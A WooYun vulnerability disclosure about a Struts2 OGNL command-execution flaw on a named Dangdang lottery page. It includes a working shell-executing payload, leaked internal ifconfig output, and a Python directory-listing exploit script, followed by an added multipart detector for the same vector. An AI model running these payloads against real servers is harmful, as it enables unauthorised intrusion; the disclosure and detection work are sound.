WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles, online reader -------- http://drop.zone.ci/
2016-07-11: Details have been sent to the vendor and are awaiting vendor handling
2016-07-11: The vendor has viewed the vulnerability; details are disclosed to the vendor only
2016-07-16: The vendor has actively ignored the vulnerability; details are disclosed to the public
With the right tool in hand, the world is mine.
I earned tangyuan (TangScan credits) by submitting a plugin to TangScan, spent them on another plugin, and it turned up a Struts2 command execution on a Dangdang site:
Vulnerable URL: http://caipiao.dangdang.com/cbportal/usercenter/hemai.htm  There appears to be some protection or filtering in front of it; the earlier payloads no longer work. Test payload:
Directory listing:
Command execution:
Decoded result of ifconfig:
eth0      Link encap:Ethernet  HWaddr 90:B1:1C:4C:A9:F2
          inet addr:192.168.1.203  Bcast:192.168.1.255  Mask:255.255.255.0
          inet6 addr: fe80::92b1:1cff:fe4c:a9f2/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:3425084210 errors:0 dropped:15 overruns:0 frame:4604
          TX packets:2920393573 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:2642679068898 (2.4 TiB)  TX bytes:1537753012738 (1.3 TiB)
          Interrupt:194 Memory:d91a0000-d91b0000

lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:910780964 errors:0 dropped:0 overruns:0 frame:0
          TX packets:910780964 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:484110986527 (450.8 GiB)  TX bytes:484110986527 (450.8 GiB)

virbr0    Link encap:Ethernet  HWaddr 00:00:00:00:00:00
          inet addr:192.168.122.1  Bcast:192.168.122.255  Mask:255.255.255.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:26 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:0 (0.0 b)  TX bytes:4022 (3.9 KiB)
That confirms the vulnerability; I did not go any further. The command-execution payload is attached below:
${"~["+new java.io.BufferedReader(new java.io.InputStreamReader(new java.lang.ProcessBuilder(new java.lang.String[]{'/bin/sh','-c','ifconfig|base64 -w 0'}).start().getInputStream())).readLine()+"]~"}
Directory listing script:
#! /usr/bin/env python
# -*- coding: utf-8 -*-
import re
import requests

path = '/usr/local/bea/'   # directory to list
url = "http://caipiao.dangdang.com/cbportal/usercenter/hemai.htm"   # vulnerable URL
# The OGNL expression goes in the multipart field name; the ~[ ... ]~ markers make
# the evaluated result easy to pull out of the response.
data = """--289b3f46292c4eee95g3f64e37d6f4dc\r\nContent-Disposition: form-data; name="redirect:/${"~["+new java.io.File("%s").listFiles()[%s]+"]~"}"\r\n\r\n10498\r\n--289b3f46292c4eee95g3f64e37d6f4dc--"""

try:
    headers = {
        'Content-Type': 'multipart/form-data; boundary=289b3f46292c4eee95g3f64e37d6f4dc',
        'User-Agent': 'Mozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.9.0.9) Gecko/2009042113 Ubuntu/9.04 (jaunty) Firefox/3.0.9'
    }
    # listFiles()[x]: one request per index until the array runs out
    for x in range(0, 400):
        response = requests.post(url, data=data % (path, str(x)), headers=headers,
                                 timeout=5, verify=False, allow_redirects=False)
        result = re.findall(r'~\[(.*?)\]~', response.text, re.S | re.I)
        if len(result) != 0:
            print(result[0])
        else:
            print("Result End.....")
            break
except Exception as e:
    print(str(e))
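The request the script above puts on the wire is also exactly what a WAF or request-log detector should be catching. The following is an added example, not code from the original report or from WooYun: it parses a multipart body constructed with the page's boundary and payload, takes field names the way a quote-aware Content-Disposition parser does (a ';' only ends a parameter outside double quotes, so the payload's embedded quotes do not truncate the name), and flags Struts 2 DefaultActionMapper prefixes (`redirect:`, `redirectAction:`, `action:`, the S2-016 family, which is the vector this payload uses) combined with OGNL expression syntax in a field name. The sample bodies and the sample 302 response are constructed for the example, and the function names (`scan_multipart`, `classify_field_name`, and so on) are my own.

```python
import re

# Added detection example; the bodies below are constructed, not captured traffic.

# Struts 2 DefaultActionMapper prefixes that unpatched versions evaluated as OGNL
# (S2-016 family); the payload on this page uses "redirect:".
STRUTS_PREFIXES = ("redirect:", "redirectAction:", "action:")
OGNL_MARKERS = ("${", "%{")
# The page's payload wraps its output in ~[ ... ]~ so it can be pulled out of the response.
RESULT_RE = re.compile(r"~\[(.*?)\]~", re.S)


def disposition_params(value):
    """Split a Content-Disposition header value into its parameters.

    A ';' only ends a parameter when we are outside double quotes, which is how
    a quote-aware parser behaves. That matters here: the OGNL payload contains
    embedded double quotes, and a naive regex such as name="([^"]*)" would stop
    at the first of them and report a harmless-looking name ('redirect:/${').
    """
    params, buf, quoted = {}, [], False
    for ch in value + ";":                       # trailing ';' flushes the last token
        if ch == '"':
            quoted = not quoted
        if ch == ";" and not quoted:
            token = "".join(buf).strip()
            buf = []
            if "=" in token:
                key, val = token.split("=", 1)
                params[key.strip().lower()] = val.strip().strip('"')
            continue
        buf.append(ch)
    return params


def multipart_field_names(body, boundary):
    """Return the field name of every part in a multipart/form-data body."""
    delim = b"--" + boundary.encode()
    names = []
    for chunk in body.split(delim)[1:]:
        if chunk.startswith(b"--"):
            break                                # closing "--boundary--"
        headers = chunk.lstrip(b"\r\n").split(b"\r\n\r\n", 1)[0]
        for line in headers.split(b"\r\n"):
            text = line.decode("latin-1")
            if text.lower().startswith("content-disposition:"):
                name = disposition_params(text.split(":", 1)[1]).get("name")
                if name is not None:
                    names.append(name)
    return names


def classify_field_name(name):
    """Return a verdict for a field name, or None if nothing is suspicious."""
    has_ognl = any(marker in name for marker in OGNL_MARKERS)
    lowered = name.lower()
    prefixed = any(lowered.startswith(p.lower()) for p in STRUTS_PREFIXES)
    if prefixed and has_ognl:
        return "struts-prefix-ognl"      # mapper prefix + expression: this page's vector
    if has_ognl:
        return "ognl-in-field-name"      # expression syntax in a parameter name is never legitimate
    return None


def scan_multipart(body, boundary):
    """Map every suspicious field name in the body to its verdict."""
    findings = {}
    for name in multipart_field_names(body, boundary):
        verdict = classify_field_name(name)
        if verdict is not None:
            findings[name] = verdict
    return findings


def extract_results(response_text):
    """Pull the ~[...]~-wrapped values out of a response, as the page's script does."""
    return RESULT_RE.findall(response_text)


BOUNDARY = "289b3f46292c4eee95g3f64e37d6f4dc"      # same boundary as the page's script
PAYLOAD_NAME = 'redirect:/${"~["+new java.io.File("/usr/local/bea/").listFiles()[0]+"]~"}'

# Constructed: what the page's script sends for index 0.
ATTACK_BODY = (
    "--" + BOUNDARY + "\r\n"
    'Content-Disposition: form-data; name="' + PAYLOAD_NAME + '"\r\n\r\n'
    "10498\r\n"
    "--" + BOUNDARY + "--"
).encode()

# Constructed: an ordinary file upload, to show the detector stays quiet on it.
BENIGN_BODY = (
    "--" + BOUNDARY + "\r\n"
    'Content-Disposition: form-data; name="upload"; filename="notes.txt"\r\n'
    "Content-Type: text/plain\r\n\r\n"
    "hello\r\n"
    "--" + BOUNDARY + "--"
).encode()

# Constructed: a redirect response in which the evaluated expression has been echoed.
SAMPLE_RESPONSE = "HTTP/1.1 302 Found\r\nLocation: /~[/usr/local/bea/sample-dir]~\r\n\r\n"

if __name__ == "__main__":
    print(scan_multipart(ATTACK_BODY, BOUNDARY))   # {'redirect:/${...}': 'struts-prefix-ognl'}
    print(scan_multipart(BENIGN_BODY, BOUNDARY))   # {}
    print(extract_results(SAMPLE_RESPONSE))        # ['/usr/local/bea/sample-dir']
```

The point of `disposition_params` is the quote handling: a parser that stops at the first embedded quote sees a field name of `redirect:/${` and a signature keyed on the full expression never fires, while the target's own multipart parser accepts the whole quoted value. Match on the prefix plus the expression opener rather than on a full payload string.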
Upgrade.
Severity level: No impact (ignored by vendor)
Ignored on: 2016-07-16 18:30
Vulnerability Rank: 15 (WooYun rating)
None